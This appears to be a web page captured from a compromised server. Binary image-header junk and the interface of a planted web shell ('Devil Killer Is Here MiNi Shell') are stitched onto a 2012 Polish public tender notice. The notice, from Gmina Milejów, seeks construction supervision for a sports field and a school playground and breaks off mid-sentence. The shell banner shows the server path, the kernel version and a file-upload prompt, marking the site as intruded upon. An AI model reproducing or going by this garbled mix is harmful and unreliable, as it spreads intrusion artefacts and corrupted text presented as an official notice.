JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120404/77631-N-2012.html

<p class="kh_header"><b>Milejów: Nadzór inwestorski dla Projektów pn.: Rozwój infrastruktury rekreacyjnej poprzez budowę wielofunkcyjnego boiska sportowego wraz z placem parkingowym w msc. Białka, Rozwój infrastruktury rekreacyjnej poprzez budowę placu zabaw przy Szkole Podstawowej w ms. Białka</b><br>
<b>Numer ogłoszenia: 77631 - 2012; data zamieszczenia: 04.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Milejów , ul. Partyzancka 13A, 21-020 Milejów, woj. lubelskie, tel. 081 7572026, faks 081 7572385.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.milejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski dla Projektów pn.: Rozwój infrastruktury rekreacyjnej poprzez budowę wielofunkcyjnego boiska sportowego wraz z placem parkingowym w msc. Białka, Rozwój infrastruktury rekreacyjnej poprzez budowę placu zabaw przy Szkole Podstawowej w ms. Białka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: sprawowanie nadzoru inwestorskiego zgodnie z polskim Prawem Budowlanym oraz organizację, koordynację procesu inwestycyjnego, kontrole, rozliczenie rzeczowo-finansowe robót zgodnie z wymogami Programu Rozwoju Obszarów Wiejskich /PROW/ na lata 2007-2013. zadań inwestycyjnych Rozwój infrastruktury rekreacyjnej poprzez budowę wielofunkcyjnego boiska sportowego wraz z placem parkingowym w msc. Białka Rozwój infrastruktury rekreacyjnej poprzez budowę placu zabaw przy Szkole Podstawowej w msc. Białka Realizacja przedmiotowego Projektu będzie finansowana z następujących źródeł: Programu Rozwoju Obszarów Wiejskich na lata 2007-2013, środków finansowych Gminy Milejów, Skład personalny Inspektor Nadzoru Koordynator - osoba spełniająca warunki, o których mowa w Rozdz. V niniejszej SIWZ, posiadająca uprawnienia zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie stosownie do przepisów ustawy Prawo Budowlane, będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa posiadająca uprawnienia budowlane do nadzorowania robót w specjalności konstrukcyjno-budowlanej bez ograniczeń. Inspektor Nadzoru Inwestorskiego branży elektrycznej - osoba spełniająca warunki, o których mowa w Rozdz. V niniejszej SIWZ, posiadająca uprawnienia zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie stosownie do przepisów ustawy Prawo Budowlane, będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa posiadająca uprawnienia budowlane do nadzorowania robót w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych. W razie nieobecności w/w specjalisty, wynikającej np. z urlopu, zwolnienia lekarskiego itp., Wykonawca zapewni czasowe zastępstwo na cały czas nieobecności by uniknąć zwłoki w realizacji robót. Takie czasowe zastępstwo będzie przedłożone z wyprzedzeniem na piśmie /łącznie z CV proponowanych osób/, do aprobaty Zamawiającego. 2. Charakterystyka nadzorowanych robót. Projekt będzie realizowany w centralnej części województwa lubelskiego, w powiecie Łęczyńskim w miejscowości Białka gm. Milejów. Adres: Białka 116 21-020 Milejów 2.1. Boisko wielofunkcyjne. Przedmiotem inwestycji jest budowa boiska wielofunkcyjnego wraz z wyposażeniem o nawierzchni z trawy syntetycznej o wymiarach pola gry 26x56m /wymiar całkowity - 30x62m/ wraz z ogrodzeniem. W zakresie jest również kontener przebieralni oraz elementy oświetlenia zewnętrznego. Dane dot. wielkości obiektu. Powierzchnia całkowita obiektu - 2660,7 m2 Powierzchnia boiska - 1860,0m2 Powierzchnia komunikacji (kostka bet. 8cm) - 650m2 Powierzchnia komunikacji (kostka bet. 6cm) - 87m2 Powierzchnia płyt typu meba - 60m2 Rozwiązania funkcjonalne Boisko wielofunkcyjne z trawy syntetycznej o wymiarach pola gier 26x56m. Na boisku znajdować się będą następujące pola do gier: - 2 pola gry do koszykówki, - 2 pola gry do piłki siatkowej, - pole gry do piłki nożnej, - pole gry do tenisa wraz z kpl. Wyposażeniem. 2.2. Plac zabaw. Przedmiotem inwestycji jest budowa szkolnego placu zabaw z nawierzchnią poliuretanową o powierzchniach 240 m2 - o wymiarach 10x24m wraz z ogrodzeniem obejmujący teren o powierzchni 480m2 - (20x24m). Zakres obejmuje urządzenia placu zabaw wg tzw. programu /Radosna Szkoła/ wraz z nawierzchnią bezpieczną oraz wyposażenie nie będące objęte programem z nawierzchnią z żwiru płukanego. Dane dot. wielkości obiektu Powierzchnia całkowita obiektu - 480 m2 Powierzchnia placu zabaw (poliuretan) - 240 m2 Powierzchnia placu zabaw (żwir płukany) - 134 m2 Długość obrzeży - 103 m Wyposażenie Placu zabaw: (zestaw mały IV) - wg programu /Radosna Szkoła/ - 1kpl huśtawka wagowa podwójna 4 os. - 1 kpl huśtawka wahadłowa - 1 kpl bujak na sprężynie - 1 kpl piaskownica drewniana 2,5x2,5m - 1 kpl Zakres robót budowlano-montażowych do wykonania zawierają załączone przedmiary robót. Załączone przedmiary robót służą tylko do uzupełnienia opisu przedmiotu zamówienia. Szczegółowy opis i wszystkie elementy robót zgodne z właściwościami określonymi w dokumentacji budowlano-technicznej. Zawarte w dokumentacji budowlano-technicznej wskazania urządzeń i materiałów pochodzących od konkretnych producentów mają charakter przykładowy. W trakcie realizacji mogą być zastosowane urządzenia i materiały równoważne, pochodzące od innych producentów pod warunkiem, że ich parametry odpowiadają co najmniej parametrom urządzeń i materiałów ujętych w projekcie i posiadają co najmniej taką wartość techniczną, użytkową, estetyczną jakiej wymaga zamawiający z uwzględnieniem przepisów ustawy Prawo budowlane. Zamawiający zastrzega sobie możliwość zmiany zakresu rzeczowego w sytuacji konieczności realizacji przez Wykonawcę robót budowlanych robót zamiennych na zasadach ustalonych przez Zamawiającego. Zamawiający zaleca, aby Wykonawca zapoznał się z miejscem realizacji i warunkami wykonywania zamówienia. 3. ZAKRES PRAC Informacje ogólne Wykonawca jest odpowiedzialny za organizację, rozliczenie, nadzór nad realizacją robót budowlanych i koordynację realizacji Projektu . Wykonawca zobowiązany jest do: 1) zapoznania się z dokumentacją projektową w celu zidentyfikowania możliwych obszarów problemowych i przedstawienia Zamawiającemu niezbędnych działań zaradczych w ciągu 7 dni od otrzymania dokumentacji budowlano technicznej, 2) współpracy z Zamawiającym w zakresie konsultacji oraz doradztwa technicznego i budowlanego przy wyłonieniu Wykonawcy robót budowlanych , 3) przygotowywania odpowiedzi na pytania zadawane przez wykonawców w trakcie postępowania przetargowego dotyczące zagadnień budowlano-technicznych Projektu oraz udział w badaniu ofert 4) kontroli jakości robót oraz wbudowywanych materiałów i urządzeń, 5) udziału w odbiorach częściowych i końcowym, przeglądach gwarancyjnych i odbiorze pogwarancyjnym, 6) podejmowania czynności mających na celu ochronę interesów Inwestora 7) uczestniczenia w kontrolach, sporządzania i archiwizacji wszelkich dokumentów wymaganych przepisami prawa i programem PROW 2007-2013 w zakresie realizowanego projektu 8) przebywania na placu budowy przez czas niezbędny do należytego wykonania niniejszej umowy, z obowiązkiem pobytu na placu budowy co najmniej raz w tygodniu oraz w przypadkach wystąpienia okoliczności mogących mieć wpływ na jakość i terminowość prowadzonych robót (z wyjątkiem przerw w prowadzeniu nadzorowanych robót budowlanych wynikających z przyczyn zewnętrznych niezależnych od wykonawcy robót budowlanych i odnotowanych w dzienniku budowy) Potwierdzeniem obecności inspektora nadzoru na placu budowy będą wpisy w dzienniku budowy. Zadania Wykonawcy: 1) ponosi pełną odpowiedzialność za prowadzenie robót zgodnie z obowiązującym prawem budowlanym, programem PROW 2007-2013, ustawą Prawo zamówień publicznych, umową zawartą pomiędzy Gminą Milejów i Instytucją Pośredniczącą oraz wykonawcą w zakresie przewidzianym projektem , 2) w terminie do 7 dni licząc od daty podpisania umowy uzgodni z Zamawiającym metody składania i wzory wszystkich wymaganych raportów inspekcyjnych, protokołów odbiorów częściowych i końcowego oraz innych dokumentów mających być w użyciu w ramach realizacji Projektu, 3) zapewnia pełny nadzór inwestorski we wszystkich aspektach zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane.(t.j. Dz.U. z 2010 r., Nr 243, poz. 1623, z późn. zm.), 4) systematycznie monitoruje i dokumentuje postępy w realizacji Projektu zgodnie z dokumentacją techniczną, dokumentami przetargowymi oraz zatwierdzonymi harmonogramami, 5) będzie odpowiedzialny za sprawdzanie harmonogramów rzeczowo-finansowych całego Projektu, 6) organizuje i prowadzi narady techniczne, problemowe i inne spotkania, które będą prowadzone w razie potrzeby, ale nie rzadziej niż 1 raz w miesiącu oraz przygotowuje notatki i raporty w celu umożliwienia podejmowania decyzji o każdym zagadnieniu, które wpływa na postęp robót. W spotkaniach tych powinny uczestniczyć wszystkie strony zaangażowane w Projekt, 7) jest odpowiedzialny za rozwiązywanie problemów i sporów powstałych w trakcie realizacji robót, 8) jest odpowiedzialny za ocenę, aprobatę bądź odrzucenie wszystkich próśb Wykonawcy zgodnie z obowiązującym prawem budowlanym. Wszystkie decyzje mogące wpływać na zakres umowy, jego czas trwania lub cenę wymagają zgody Zamawiającego, 9) weryfikuje, analizuje i zatwierdza do zapłaty faktury wystawione przez Wykonawcę w związku z realizacją umowy z Wykonawcą, 10) w przypadku wystąpienia konieczności wykonania robót zamiennych Inspektor nadzoru jest odpowiedzialny za uzgodnienie sposobu postępowania z Zamawiającym, 11) jest zobligowany do udzielania regularnych konsultacji i doradztwa technicznego i budowlanego Zamawiającemu, czynnego uczestniczenia we wszelkich kontrolach jakim zostanie poddany Zamawiający w obszarze realizacji projektu, 12) sprawdza jakość wykonywanych robót, wbudowanych elementów, a w szczególności zapobiega zastosowaniu materiałów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania. Sprawdza czy wszystkie używane materiały posiadają świadectwa i certyfikaty jakości, 13) przygotowuje propozycje wprowadzenia do projektu budowlano-technicznego inwestycji uzupełnień lub modyfikacji zastosowanych rozwiązań w razie stwierdzenia: a) wad lub braków uniemożliwiających prowadzenie robót, b) zauważenia w zastosowanej technologii nieadekwatnych rozwiązań mogących mieć wpływ na przyszłe funkcjonowanie obiektu, propozycje te po akceptacji Zamawiającego przedkłada Jednostce Projektowej, 14) dokonuje sprawdzania i odbioru robót ulegających zakryciu lub zanikających; dodatkowo uczestniczy w odbiorach częściowych i końcowym; sporządza protokoły ze spotkań odbiorowych, 15) wydaje kierownikowi robót polecenia potwierdzone wpisem do dziennika budowy dotyczące: wykonania prób, wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót, dowodów dopuszczenia do obrotu i stosowania wyrobów oraz urządzeń technicznych; sprawuje nadzór nad ilością i terminowością wykonywanych robót, 16) ma obowiązek zawiesić roboty w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne, 17) weryfikuje obmiary każdego etapu robót, a przyjęta metodologia musi być zgodna z właściwą specyfikacją wykonania i odbioru robót, 18) dokonuje weryfikacji dostarczonych przez Wykonawcę robót rozliczeń przed dokonaniem płatności przed Zamawiającego, 19) jest odpowiedzialny za przedkładanie Zamawiającemu wszystkich raportów, oświadczeń i zapytań dostarczonych przez Wykonawcę, 20) sprawdza i zatwierdza w porozumieniu z Zamawiającym dokumentację powykonawczą sporządzoną przez Wykonawcę, 21) nadzoruje wszystkie próby związane z odbiorem technicznym i jest zobowiązany do uczestniczenia w próbach końcowych, 22) sporządza dokumentację z przeglądów gwarancyjnych obejmującą: wykaz usterek i wad, wskazanie przyczyn powstania usterek i podanie zaleceń odnośnie ich usunięcia, sporządzenie kalkulacji (wyceny) dot. powstałych usterek i wad, 23) po uzgodnieniu z Zamawiającym, wykona wszystkie inne czynności, nie wymienione w umowie z Wykonawcą , które zostaną uznane za niezbędne dla prawidłowej realizacji Projektu, 24) przy udziale Kierownika budowy kompletuje i sprawdza dokumentację odbiorową, 25) przy udziale Kierownika budowy kompletuje i weryfikuje dokumenty niezbędne do zgłoszenia zakończenia robót przed przystąpieniem do użytkowania w Powiatowym Inspektoracie Nadzoru Budowlanego. Wymagania dotyczące sprawozdawczości i płatności: 1. Aktywnie wspiera działania Zamawiającego w szczególności uczestniczy przy sporządzaniu sprawozdań i raportów oraz wniosków o płatność. 2. Sposób i forma rozliczenie rzeczowo-finansowego inwestycji przygotowanego przez wykonawcę robót wymagają akceptacji Inspektora z uwzględnieniem wytycznych PROW 2007-2013. 3. Przygotowuje informacje do sporządzenia dowodów przekazania - przejęcia na majątek środków trwałych PT. Wykonawcom przed złożeniem oferty zaleca się zapoznać się z dokumentacją budowlano techniczną dotyczącą Projektu, dostępną w Urzędzie Gminy w Milejowie ul. Partyzancka 13a 21-020 Milejów od poniedziałku do piątku (za wyjątkiem dni ustawowo wolnych od pracy) w godz. 8.oo - 14.oo po wcześniejszym uzgodnieniu terminu jej udostępnienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.40.00-0, 71.24.70.00-1, 71.24.80.00-8, 71.31.00.00-4, 71.00.00.00-8, 71.53.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda aby wykonawca wniósł wadium w wysokości 
    300,00  PLN (słownie: trzysta 00/100zł)
2. Wadium należy wnieść nie później niż do 12-04-2012 r. do godz. 10:00
3. Wadium można wnieść w jednej lub kilku następujących formach:
Pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz. 1158 z póź. zm.)
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek 86868900074000009520000040
5. Wadium wnoszone w pozostałych formach należy złożyć w Urzędzie Gminy w Milejowie przy ulicy Partyzanckiej 13 A pok. Nr 6, a kopię należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca byłby zobowiązany wykazać w sposób szczególny. Ocena spełniania tego warunku dokonana będzie na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - lub wykonuje co najmniej jedną usługę nadzoru inwestorskiego i rozliczenia inwestycji z zakresu budowy boiska sportowego o nawierzchni z trawy syntetycznej, co najmniej jedną usługę nadzoru inwestorskiego i rozliczenia inwestycji z zakresu budowy placu zabaw o nawierzchni bezpiecznej - o łącznej wartości brutto inwestycji nie mniejszej niż 800 000,00 zł ( słownie: osiemset tysięcy złotych ) W celu potwierdzenia powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca byłby zobowiązany wykazać w sposób szczególny. Ocena spełniania tego warunku dokonana będzie na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który dysponuje lub będzie dysponował co najmniej 1 osobą przewidzianą na Inspektora Nadzoru Koordynatora posiadającą minimum 5 letnie doświadczenie zawodowe liczone od momentu uzyskania uprawnień, do nadzorowania robót budowlanych zgodnie z wymogami ustawy Prawo budowlane z dnia 7 lipca 1994 r., (j.t. Dz. U. z 2010 r., Nr 243, poz. 1623 ze zm.) lub odpowiadającymi im uprawnieniami nadanymi na podstawie wcześniej obowiązujących przepisów w specjalnościach konstrukcyjno-budowlanej bez ograniczeń co najmniej 1 osobą przewidzianą na Inspektora Nadzoru Inwestorskiego branży elektrycznej posiadającą minimum 3 letnie doświadczenie zawodowe liczone od momentu uzyskania uprawnień, do nadzorowania robót budowlanych zgodnie z wymogami ustawy Prawo budowlane z dnia 7 lipca 1994 r., (j.t. Dz. U. z 2010 r., Nr 243, poz. 1623 ze zm.) lub odpowiadającymi im uprawnieniami nadanymi na podstawie wcześniej obowiązujących przepisów w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych. W celu potwierdzenia powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenie że osoby te posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca byłby zobowiązany wykazać w sposób szczególny. Ocena spełniania tego warunku dokonana będzie na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy, Zamawiający informuje, że przewiduje możliwość zmiany postanowień zawartej umowy w następujących okolicznościach: 1) w przypadku wystąpienia siły wyższej możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy; siłę wyższą rozumie się jako zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. Zmiana taka może dotyczyć w szczególności przesunięcia terminu realizacji umowy; 2) w zakresie terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana następstwem okoliczności leżących po stronie Zamawiającego; 3) w zakresie terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana zmianą terminu wykonania robót budowlanych, w tym wypadku Wykonawca obowiązany jest do realizacji przedmiotu umowy w terminie wynikającym ze zmiany terminu wykonania robót budowlanych; 4) w przypadku zmiany stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy; 5) zmiany osób wyznaczonych do pełnienia Nadzoru Inwestorskiego wynikającej 